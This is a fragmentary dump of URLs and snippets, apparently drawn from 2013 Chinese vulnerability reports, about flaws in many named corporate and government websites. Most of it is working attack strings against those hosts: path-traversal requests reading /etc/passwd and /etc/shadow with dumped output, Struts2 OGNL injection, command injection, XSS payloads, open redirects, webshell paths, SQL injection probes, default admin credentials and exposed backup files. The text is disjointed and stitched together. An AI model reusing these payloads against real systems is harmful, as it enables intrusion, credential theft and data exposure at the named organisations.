http://www.weipai.com/user/4e626f71677c27fc24000000 
http://en.kingdee.com/index.php?option=com_ninjarsssyndicator&feed_id=1&format=raw&catid=4 http://www.xwwb.com/web/wb2008/wb2008news.php?db=5&thisid=143962 http://you.joy.cn/Web.config.bak http://blog.cntv.cn/config.php.bak http://ebuy.avic.com/front/user-login.action http://ebuy.avic.com/shell.jsp encap:Ethernet AE:8B:21:FF:4A addr:10.64.2.105 Bcast:10.64.2.255 Mask:255.255.255.0 fe21:ff4a/64 Scope:Link MTU:1500 packets:19212807 packets:18512781 txqueuelen:1000 http://rdscm.midea.com.cn:7008/ http://58.252.101.32:8000/export/ http://www.19lou.com/thread/category/structure/search/result?m=10001&fid=1637&mf_1391=%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E// http://house.19lou.com/newhouse?houseType=%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E// http://www.dianwoba.com/supplier/restaurant!gtChainSupplierList.do http://www.dianwoba.com:8080/supplier/restaurant!gtChainSupplierList.do http://www.dianwoba.com/auth/login!sinaAuth.do http://www.dycgj.gov.cn/dydy/index.action http://ehr.lzlj.com.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&CurrentFolder=/../../&Type=File http://220.178.124.29/zhzyk/public/secondList.xp?ptreeid=0004&streeid=0001&treeid=00020003 http://global.midea.com.cn/midea/ http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/shadow%00.jpg w1:15684:0:99999:7 J0i8zKZ9EnbiUzjHPegXh0:14125:0:99999:7 http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/passwd%00.jpg http://reg.sun0769.com/login.action http://www.avic-wztj.com/front/user-login.action encap:Ethernet A4:BA:DB:18:4B:13 addr:172.16.2.19 Bcast:172.16.2.255 Mask:255.255.255.0 a6ba:dbff:fe18:4b13/64 Scope:Link MTU:1500 packets:1103420139 packets:7491152288 txqueuelen:1000 www.douguo.com http://www.chyip.gov.cn/userfiles/file/ http://www.chyip.gov.cn/userfiles/image/1.aspx http://mitv.tcl.com/DRP/login.action http://www.chjsj.gov.cn/ewebeditor/db/ewebeditor.mdb 
http://www.chjsj.gov.cn/admin/data/data.mdb http://www.chjsj.gov.cn/admin/admin_add.asp http://hb.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://cz.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://wh.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://bz.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://chz.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://xc.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=1 http://www.ahwh.gov.cn/zwgk/ListByDate.asp?sDate=2013 http://www.nsfocus.com/3_support/kb.php?product=NIDS http://support.nsfocus.com/kb.php?q=88952634 http://crm.fogrow.com admin:123456 www.hbgzw.gov.cn http://219.141.246.31:9000/webapp/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../ http://ktshop.tcl.com/ http://kdeas.kingdee.com/easWebClient/deploy/client/ctrlhome/client/KDNoteConfig.xml http://kdeas.kingdee.com/easWebClient/deploy http://cvn.test.kingdee.com http://123.103.23.10/lxjweb/ http://hrss.jiangxi.gov.cn/images.aspx http://blog.ifeng.com/article/30864350.html http://order.xiaomi.com/site/loginurl http://order.xiaomi.com/site/loginurl?followup=http://requestb.in/1kd0b981?.xiaomi.com https://account.xiaomi.com/pass/serviceLogin?callback=http%3A%2F%2Forder.xiaomi.com%2Flogin%2Fcallback%3Ffollowup%3Dhttp%253A%252F%252Frequestb.in%252F1kd0b981%253F.xiaomi.com%26sign%3DMWFiNDVhOGNiNWUyYWE3NjMxNDFiYjA3MzE0Yjc1Zjg0OWZiMjQ1Ng%2C%2C&sid=eshop http://order.xiaomi.com/site/loginurl?followup=http://www.xiaomi.com.example.com https://account.xiaomi.com/pass/serviceLogin?callback=http%3A%2F%2Forder.xiaomi.com%2Flogin%2Fcallback%3Ffollowup%3Dhttp%253A%252F%252Fwww.xiaomi.com.example.com%26sign%3DYTBjMDVhN2ZlYjg0OGQ3MWRiYTg3M2NmMTg3NzA5MDViYzkyMWNmYw%2C%2C&sid=eshop http://120.31.50.116:8080/mayi.website/web!index.action http://inforadar.trs.com.cn/jsp/util/file_download.jsp?filePath=c:%5Cboot.ini%00.xml http://203.208.46.145/#newwindow=1&q=intitle:trs+inurl:inforadar&start=10 
http://203.208.46.145/#filter=0&newwindow=1&q=inurl:jsp/portalsearch http://www.baidu.com/s?wd=inurl%3Ainforadar&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_sug3=13&rsv_sug=0&rsv_sug1=12&rsv_sug4=777 http://yiliao.kingdee.com http://yiliao.kingdee.com/admin/customerEdit.php?id=3&types=3 http://yiliao.kingdee.com/admin/customerEdit.php?id=3&types=3 http://www.court.gov.cn/qwfb/sfwj/yj/201309/552.html http://www.hnnjj.gov.cn/login_frame.jsp http://www.zhoukou.gov.cn/zk_xxgk/gkzn.jsp?id=1220597481203 http://www.zhoukou.gov.cn/board/anser_list.jsp?id=3451 http://www.zhoukou.gov.cn/shpy/shpy.jsp?id=26 http://zhoukou.gov.cn/yjzj/yjzj_xx.jsp?adid=bd1e5b493b4faa9c013b55ae56b90066 http://zhoukou.gov.cn/zk_xxgk/listdetail.jsp?artid=1220585391375&id=102001 http://www.haval.com.cn/haval_newslist.html http://www.haval.com.cn:80/ www.haval.com.cn http://www.youlin.com/.svn/entries trs:templateservicefacade www.cncotton.com soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:impl="http://impl.service.template.trs.com soapenv:Header/ soapenv:Body impl:writeSpecFile soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="soapenc:base64Binary xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="soapenc:string xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/ impl:writeSpecFile soapenv:Body soapenv:Envelope http://www9.vanke.com/main/Investor/register/savecontacts.asp?id=30762 http://zzjyt.haier.net/ZZJYT/login/index.jsp http://61.146.213.142//test.txt www.dopool.com http://dc.dopool.com/ http://dc.dopool.com/wp-admin/ http://csjszj.cn/test.txt http://chuang.yicai.com/forum/topic?forum_topic_id=140 http://www.aqcz.gov.cn/index.php?c=main&a=toCommonArticle&res=xqdt_article&id=90 http://www.hrbcb.gov.cn//test.txt http://www.yb315.com.cn/test.txt http://www.19yuedu.com/forum-27-1.html 
http://www.kingdee.com/experience/ http://218.85.73.166:8081/inforadar/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd http://180.184.97.42/uploadfile/time/2013/ http://www.yisence.net/Sell/GetServerIp.aspx?id=2 inurl:infodetail/?infoid= URL:http://kabedm.lenovo.com.cn/link/ http://xzfw.wuhai.gov.cn/admin/ http://jiepang.com/ http://61.150.78.80//test.txt http://store.kingdee.com/event/11k3wise_xz/walls.php?event_id=2 http://open.kingdee.com/K3cloud/Democenter/ProductInfo.aspx?id=106653 http://dopool.com/web.zip备份下载 http://ht.ahta.com.cn/scenic/info.php?id=001 http://ht.ahta.com.cn/xinxi/info.php?id=110901054802 http://ht.ahta.com.cn/line/info.php?id=001 http://218.77.181.61:8001/LoginAction.action http://www.ahpress.gov.cn/sitecn/list.aspx?type=1441 http://www.ahpress.gov.cn/sitecn/search.aspx?title= http://user.kuaiwan.com/account/get_password/ http://user.kuaiwan.com/account/get_password/verify/?email=189837992@qq.com&verify=6205ed5cd3e4456a8b236ef4bddf731e http://web.kuaiwan.com/jifen/?from=web#top http://dyn.web.kuaiwan.com/JiFen/removeFriend/40431/?callback=jsonp1382005206571 http://www.ahjt.gov.cn/service/guestbook/Modify_GBook.asp?Id=4403 http://www.hnds.gov.cn/comm_front/tzzx/uploadImageFile_do.jsp?uri=/ http://www.hnds.gov.cn/cms/siteResource/uploadfiles/tzzx/下。 http://www.gxstd.com/default1.asp?autologin=1&pwd=1&uid=1 http://www.gxstd.com/default.asp?autologin=1&pwd=1&uid=1 http://search.lycos.co.kr/里面搜 http://www.airmacau.com.mo/about/news_articles.asp?id=208 http://www.airmacau.com.mo/test/ http://www.airmacau.com.mo/admin/ http://xzwwj.sach.gov.cn/news/newshow_help.aspx?newsid= http://www.soso.com/q?w=r%3C/script%3E%3Cxstyle%3E%3Cscript/src=http://www.radio1.co.tz/test.js%3E%3C/script%3E www.radio1.co.tz为注册的域名,这里我随便从网上找了一个co.tz的域名,然后本地host到127.0.0.1,test.js的内容为 http://msla.hz.letv.com/upload.jsp?action=upfile http://www.xiangtan.gov.cn/fileoper/sendfile.jsp?s_target=/,s_target是上传目录,/表示网站根目录。此处可以上传任意类型文件,通过上传jsp文件可getshell。 
http://117.27.130.39 http://www.kingdee.com http://www.kingdee.com/hotNewsList.do?catalog=hmolPvBz*&curPage=1&days=1&topic=%D6%C6%D4%EC%D2%B5%CA%D0%B3%A1%D7%B7%D7%D9 http://www.wealink.com www.quanyouyg.com/index.php?m=Prod&a=index&pid=88 http://www.wooyun.org http://127.0.0.1/admin/skins/skins.php?ac=xgmb&path=../../skins/index/html/&name=aaa.php http://192.168.20.100/cgi-bin/backupsAdd.php?old_name=2013-10-17-234141.bak&name=2013-10-17-234141.bak http://192.168.20.100/cgi-bin/backupsAdd.php?old_name=2013-10-17-234141.bak&name=2013-10-17-234141.bak;ls%20-l http://ghml.csdb.cn/axis2-admin/ http://posims.yeepay.com/agent/register.action http://kt.tcl.com/ http://tclbjd.etwowin.com http://kt.tcl.com/ http://kt.tcl.com/ http://tp.dzwww.com/zhuanti/sdtyn/index.jsp?group=2 http://cw-info.shenzhenair.com/QMYS/Web/Login.aspx http://cw-info.shenzhenair.com/QMYS/Web/Login.aspx www.highso.org.cn http://admin.highso.cn/sys/backLogin!login.action http://olcs2.csair.com/iframe_logo.php?arg=csair&style_id=103608619&is_zdylogo=1&style_hangye_id=0&logo_lock=0&proxy=&company_id=70722519&gggj_logo=0&key=1&ykey=1&is_yx=Y http://olcs2.csair.com/iframe_logo.php?arg=csair&style_id=103608619&is_zdylogo=1&style_hangye_id=0&logo_lock=0&proxy=&company_id=70722519&gggj_logo=0&key=1&ykey=1&is_yx=Y www.investsc.cn http://www.investsc.cn/web/fair!ztIndex.action http://rf.shenzhenair.com/ http://open.t.sohu.com/index.jsp http://open.t.sohu.com/apps/validateApply?app_id=13585&dt=1381812271343 http://open.t.sohu.com/apps/editappstat?app_id=13585&status=1 http://qudaobbs.ganji.com/uc_server/admin.php www.shenzhenair.com找回密码时有如下链接: http://www.shenzhenair.com/regist/userMgr.do?operate=mailYz&ux=138206xxxx,重置密码时只判断ux值(重置链接2小时内有效)。测试时用两个账号分别发送找回密码请求,发现ux=138206xxxx后四位数字不一样。 http://www.shenzhenair.com/regist/userMgr.do?operate=mailYz&ux=1382066765 www.169ol.com http://jxt.169ol.com:8080/mschool/selectLoginUser.action http://wqt.169ol.com/map.action;jsessionid=C763EA11A309BB0F0574AF0F1BCD6377 
http://hwtrip.smartcom.cc/user.php?act=resetPSW&email=xxxx@sina.com&ck=fada81749**********6e63c7c0c8&uid=123456789 www.vmall.com http://www.vmall.com/member/account/sendEmail.json http://tmc.95080.com/business-travel/forgetPwAction!getPassword.action http://game.wo.com.cn/information.jsp?type=1 http://ceagent.ceair.com/ http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/passwd http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysctl.conf http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/group root:x:0:root bin:x:1:root,bin,daemon daemon:x:2:root,bin,daemon sys:x:3:root,bin,adm adm:x:4:root,adm,daemon tty:x:5 disk:x:6:root lp:x:7:daemon,lp mem:x:8 kmem:x:9 wheel:x:10:root mail:x:12:mail news:x:13:news uucp:x:14:uucp man:x:15 games:x:20 gopher:x:30 dip:x:40 ftp:x:50 lock:x:54 nobody:x:99 users:x:100 nscd:x:28 floppy:x:19 vcsa:x:69 pcap:x:77 utmp:x:22 utempter:x:35 slocate:x:21 rpc:x:32 mailnull:x:47 smmsp:x:51 rpcuser:x:29 nfsnobody:x:4294967294 sshd:x:74 dbus:x:81 haldaemon:x:68 avahi-autoipd:x:101 avahi:x:70 apache:x:48 ntp:x:38 xfs:x:43 gdm:x:42 sabayon:x:86 stapdev:x:102 stapusr:x:103 hw:x:500 was:x:403:was7 wl:x:105 ot:x:201 os:x:203 bk:x:205 rd:x:206 et:x:207 cs:x:208 ap:x:209 nw:x:211 tux:x:401 mqm:x:402 uni:x:111 rduser:x:501 op:x:212 td:x:213 jboss:x:214 hexuan:x:12071 lixue:x:10053 zhangjin:x:12076 http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysconfig/network-scripts/ifcfg-eth0 http://brandbase.mama.cn/wyeth.php?mod=pregnant&fid=23#fid23 http://cmdp.ncc.cma.gov.cn/Website/index.php?ChannelID=22 http://www.cmp.cma.gov.cn/mall/talk.asp?prodid=3181 http://www.csc100.com/news/content.php?id=663 http://www.kerqin.gov.cn/rhxx.txt http://www.chengdu.gov.cn/uploadfiles/301201/201111410135.txt 
http://lbj.maoming.gov.cn/files/%E6%89%B6%E8%B4%AB%E6%8B%9B%E7%94%9F%E5%85%AC%E7%A4%BA.txt www.shxda.gov.cn http://www.edugd.cn/web/46/xw/1/46_11872/%E7%AC%AC%E4%BA%8C%E6%89%B9%E6%95%B0%E6%8D%AE%E9%97%AE%E9%A2%98_20080311.TXT http://ffp.shenzhenair.com/ffp/ http://ffp.shenzhenair.com/ffp/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ http://ffp.shenzhenair.com/ffp/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../../../../../../../../../ http://ffp.shenzhenair.com/ffp/.svn/entries http://ffp.shenzhenair.com/ffp/CVS/Entries http://ffp.shenzhenair.com/ffp/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://ffp.shenzhenair.com/ffp/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector http://ffp.shenzhenair.com/ffp/UserFiles/all/wooyun.txt http://ffp.shenzhenair.com/ffp/UserFiles/all/jspshell.jsp会跳转到http://ffp.shenzhenair.com/ffp/timeout.shtml?url=/UserFiles/all/jspshell.jsp http://hwtrip.smartcom.cc/user/ucenter.html?is_ajax=1&act=changeOrderStatus&id=13207&changeto=8&page=1&pageCount=1 http://hwtrip.smartcom.cc/book.php?bookAct=pay&orderSN=1310181xxxx http://www.nanshan.edu.cn/ks/doc_down/zxkskmylb/30%E6%97%A5%E5%89%8D%E4%BA%A4%E5%8D%A1%E6%8A%A5%E5%90%8D%E6%A0%B8%E5%AF%B9%E6%80%BB.txt http://game.open.uc.cn/ http://calt-czxy.com/ http://202.103.49.226/test.txt http://hr.shanghai-air.com/admin/login.jsp http://sus.lenovomm.com/adpportal/index.htm http://202.99.81.51/test.txt http://pay.game.pps.tv//gamepay/game_pay_main/index?tid=5601&server_type=0&g_id=341 http://jjsg.hupu.com/newusercard/getCardType?t=4&jsoncallback=jsonp1381930329833&g=82 http://brandbase.mama.cn http://www.mama.cn/q/ http://www.b-link.net.cn/index.php/news?cid=274 http://f2.warlord.duowan.cn/ http://dg.qefeng.com/index.php/Index/noticecon/id/21 
http://travel.qunar.com/plan/list/city/300079/?bookId=2558883 http://tv.tom.com/App_User_Zzjpage.php?zj_id=zj273 http://bbs.appchina.com/.svn/entries http://igame.xiaomi.com/home.php?mod=space&uid=118857&do=blog&id=3 http://de.appchina.com/ http://zabbix.sa.snyu.com/ http://fwzx.cnta.gov.cn/xxflt.asp?t_id=20 http://fwzx.cnta.gov.cn/ZW.asp?n_id=1748 http://fwzx.cnta.gov.cn/yjjy-FB2.asp?t_id=8 http://my.fm.tom.com/FMApis/androidMyLib.action filetype:xls http://219.140.192.165/ http://doer.lenovo.com.cn/ filetype:xls http://114.255.93.220 http://agents.shandongair.com.cn/ http://www.dxnma.com/login.do http://118.180.8.48/cdyx/hipster/hipster-index.do http://202.100.80.48:8888/login.do http://www.ctnma.cn/login.do http://plschool.gs.bnet.cn/web.rar http://doer.lenovo.com.cn/ http://jz.1688.com/ http://www.baidu.com/link?url=-GzGqGE0xGc6iJNYun7uTdxmrEwUnlwNRRfSO-aHMiy http://www.baidu.com/./link?url=-GzGqGE0xGc6iJNYun7uTdxmrEwUnlwNRRfSO-aHMiy http://www.baidu.com/link?url=-GzGqGE0xGc6iJNYun7uTdxmrEwUnlwNRRfSO-aHMiy的效果一样 http://intranet.tomonline-inc.com/upload/tomonline-inc.xls http://intranet.tomonline-inc.com/.svn/entries http://intranet.tomonline-inc.com/login/.svn/entries http://intranet.tomonline-inc.com/test.php http://pay.5see.com/getgameServers.aspx?game= http://121.14.4.144:8080/ http://finance.tomonline-inc.com/.svn/entries http://www.hgtech365.com/action/news/news_detail.php?url=56 http://www.elinkhost.com/confirm/ www.line0.com https://218.24.192.60:8443/login.action https://119.48.248.6:8443/license.action http://newbidding.sgcc.com.cn http://newbidding.sgcc.com.cn/jsp/indexIncludJsps/secondPage/newsListServlet?countPerPage=10&newsType=wzmore&pageNo=3&pstatuts=1 http://www.dnt.com.cn/en/business.php?id=88 http://219.141.222.104/ http://e.vmall.com/common/ajaxtrouble/11/user http://www.pahnw.cn/admin/manage_admin.asp?id=147&action=delete http://123.126.33.235 
http://123.126.33.235/api/homepage/getItemList?categoryId=4&subCategoryId=0&areaId=0&showTime=0&start=0&pageSize=10 http://123.126.33.235/thirdparty/view/homepage.action http://www.goldmail.cn/service/news_detail.php?ID=109 http://www.goldmail.cn/service/news_detail.php?ID=109 http://222.247.56.84/ http://222.247.56.84/p.rar http://222.240.168.145/PRTVUWeb/pages/status/querystudentinfo.jsp http://121.28.150.76/PRTVUWeb/pages/status/querystudentinfo.jsp http://219.142.50.49/PRTVUWeb/pages/status/querystudentinfo.jsp http://218.57.132.198/PRTVUWeb/pages/status/querystudentinfo.jsp http://125.72.41.102/PRTVUWeb/pages/status/querystudentinfo.jsp http://118.122.124.82:8000/PRTVUWeb/pages/status/querystudentinfo.jsp http://218.22.21.234/PRTVUWeb/pages/status/querystudentinfo.jsp http://210.38.32.181/PRTVUWeb/pages/status/querystudentinfo.jsp http://202.121.87.193/PRTVUWeb/pages/status/querystudentinfo.jsp http://220.174.236.26/PRTVUWeb/pages/status/querystudentinfo.jsp http://202.111.181.167/PRTVUWeb/pages/status/querystudentinfo.jsp http://61.186.170.115/PRTVUWeb/pages/status/querystudentinfo.jsp http://info.hngs.net/viewinfo.mpl?id=9042 http://e.vmall.com/login/forgetpwd,如下图所示,在找回密码的第一步填写帐号A的帐户名: http://www.zdfap.zj.sgcc.com.cn/ams/POM/contract/login.jsp http://www.zdfap.zj.sgcc.com.cn/ams/struts/ams/webPageInfo.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD 
Daemon:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin wls92:x:500:500::/home/wls92:/bin/bash tomcat:x:501:501::/home/tomcat:/bin/bash ams:x:503:503::/home/ams:/bin/bash smsws:x:504:505::/home/smsws:/bin/bash oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin http://219.147.134.27:8083/ekbs/ask/systemManageIndex.action?method=toSystemManageIndex http://219.148.7.9:8082/ekbs/ask/systemManageIndex.action?method=toSystemManageIndex http://zhishiku.yc.nx.cn:8083/ekbs/ask/systemManageIndex.action?method=toSystemManageIndex http://219.141.157.213/ekbs/ask/systemManageIndex.action?method=toSystemManageIndex http://www.suning.com.cn http://www.suning.com.cn/FeedBack.aspx?CID=8&RID=19&BID=999 http://www.beyond.cn/ http://61.183.175.36/wf/company/ToCompanyRegister.action http://baike.meadin.com/edit/create.asp http://www.china-cet.com/neirong_wangzhan.php?id=10808 http://www.china-cet.com/denglu.php 
http://www.ccgp-hubei.gov.cn/indexAction!index.action http://lvyou.baidu.com post:http://t.sohu.com/twAction/insertTwitter http://s2.t.itc.cn/mblog/pic/201310_20_20/s_a08smq4715831178488.jpg\x22\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x2f\x2f.jpg","extraData":{"smallest":{"w":120 http://www.ihaier.com/haier-rsp-portlet/download.jsp?path=/../../../../../../../../../etc/passwd&name=%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%65%74%63%2F%70%61%73%73%77%64 http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx http://bbs.mygjp.com/web/forum_search.aspx?text=1 http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx http://218.106.129.33:8080 http://218.106.129.33:8080/zecmd/zecmd.jsp http://218.106.129.33:8080/iesvc/iesvc.jsp url:http://dc.dopool.com/wp-login.php magicbox:/pentest/web/wpscan# http://dc.dopool.com http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 http://buy.111.com.cn/cart/shoppingcart/queryshoppingcart.action http://www.111.com.cn/list/list.action http://passport.111.com.cn/sso/login.action http://www.mogujie.com/trade/address http://www.mogujie.com/trade/address/getaddr4order?addressId=920174 http://www.rgrcb.com/readme.txt http://www.rgrcb.com/manage/Manage_Index.php http://218.106.129.38/V2Conf/jsp/main/mainAction.do http://218.106.129.39/V2Conf/jsp/main/mainAction.do http://218.94.1.173/Legalaid_SFB/Login.aspx http://contract.kappa.com.cn/ http://contract.kappa.com.cn/Admin/UserPrevelige.aspx http://contract.kappa.com.cn/Admin/CusAdviceDetails.aspx?M_id=1 
http://cac.midea.com/mideacac/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://123.126.33.181 http://hgcg.customs.gov.cn/hgcg/default.aspx https://hgcg.customs.gov.cn/hgcghy/Pages/HYHomeIN/index.aspx?x=1 http://job.shenzhenair.com https://219.141.222.1/GWREGISTER/UserRegisterChildAccount.action http://123.126.33.209/admin/permission/weblogin.php http://123.126.33.209/admin/tools/checkPlist/delPlistByPid.php?pidStr=1 http://123.126.33.209/admin/tools/checkPlist/delPlistByPid.php?pidStr=1 http://123.126.33.209/admin/tools/checkPlist/delPlistByPid.php?pidStr=1%20and%201=1 http://202.100.80.31/cgi-bin/web2cgi/get_att.cgi?up_attach=|cat%20/quark/etc/mysql.conf http://bbs.ce.cn/bbs/govweb/govweb_sec.php?t=1&id=33 http://www.bjmama.com http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://www.wooyun.org/bugs/wooyun-2013-040255/trace/d350ac8b712e4e10258d424c37f05637 http://www.wooyun.org/bugs/wooyun-2013-040254/trace/3be6cf3dd8b70a0f69236aef945a12dc http://www.wooyun.org/bugs/wooyun-2013-040250/trace/673b31671413cd024f256bef07983861 http://www.wooyun.org/bugs/wooyun-2013-040248/trace/ea2705562bc28f088d14ffc598e60c7a http://www.wooyun.org/bugs/wooyun-2013-040244/trace/c724e7a3ecef3ebebd8a61a4e7799042 http://robot.dangdang.com/WebIm/page/officialPortal.jsp http://www.wadj.gov.cn/asp/searchinfo.asp?ch_btnReset=%D6%D8+%D6%C3&ch_Type=1&ch_btnSearch=%CB%D1+%CB%F7&ch_Item= www.hkcts.com/ www.hkcts.com/CMS/job/resume.action?post.id=99‎ 
http://metroparkhotels.com/group_packages.php?session=2 http://www.clcn.net.cn/modules/downloads/index.php?cat_id=1 http://s.haier.com http://admin.sys.www.dianping.com/Admin_FeedBack/DP_Admin_BrowseEmail.aspx?FeedID=2781097 http://admin.sys.www.dianping.com/Admin_FeedBack/DP_Admin_BrowseEmail.aspx?FeedID=2781097 http://115.239.131.74/index.php http://www.jycin.gov.cn/FileTransferUpload/ http://115.239.130.14/login.html、http://115.239.130.12/login.html、http://115.239.130.13/、http://115.239.130.76/等等,这个段好多的。 http://www.hkctshotels.com http://hkctshotels.com/news.aspx?type=News http://hkctshotels.com/brandlist.aspx?GID=GM http://www.hkctshotels.com/brandlist.aspx?GID=GM http://www.gzmzw.gov.cn/printpage.asp?ArticleID=713,利用SQL注入可获取该网站的数据库信息,利用获取的用户名和密码登陆后台,可执行添加管理员及修改网站信息操作。 http://www.songshancn.com http://www.songshancn.com/CMS/news/search.action http://pcm.welling.com.cn:7001/ http://pcm.welling.com.cn:7001/web/plug-in/dl.jsp?fileName=item_cost_and_fee.doc&filePath=../../../../../../../../../../etc/passwd%00.doc root:x:0:0:Super-User:/:/sbin/sh daemon:x:1:1::/ bin:x:2:2::/usr/bin sys:x:3:3::/ adm:x:4:4:Admin:/var/adm lp:x:71:8:Line Admin:/usr/spool/lp uucp:x:5:5:uucp Admin:/usr/lib/uucp nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico smmsp:x:25:25:SendMail listen:x:37:4:Network Admin:/usr/net/nls gdm:x:50:50:GDM webservd:x:80:80:WebServer postgres:x:90:90:PostgreSQL UID:/:/usr/bin/pfksh svctag:x:95:12:Service nobody:x:60001:60001:NFS noaccess:x:60002:60002:No nobody4:x:65534:65534:SunOS weblogic:x:1009:888::/app:/bin/sh http://pcm.welling.com.cn:7001/b2b/ http://pcm.welling.com.cn:7001/web/images/ http://www.shmama.net/forum.php inurl:admin_add.asp http://t.163.com/rank/daren http://t.163.com/user/batchAddFocus?screenNames=hhan http://163.fm/XqkSZg6 http://www.whep.gov.cn/admin http://www.szmama.com/ 
http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://neibu.nies.net.cn/ZeeWJ.asp http://e.vmall.com/ http://wx.233.com/search/school/Courseaware/jy.asp?DCourseID=17773 http://s.233.com/search/zhuanti/ksnewslist.asp?id= http://bbs.233.com/hack.php?H_name=qiandao&qdorder=totaldays http://s.233.com/search/comment/?NewsID=1322814432590740&Domain=zq http://s.233.com/search/comment/?NewsID=1322814432590740&Domain=zq http://s.233.com/search/comment/?NewsID=1322814432590740&Domain=zq http://s.233.com/search/comment/?NewsID=1322814432590740&Domain=zq http://hi.haidilao.com/pages/creative/creative_list.jsp http://zsall.mobilem.360.cn/wallpaper/search?start=0&num=99&kw= http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 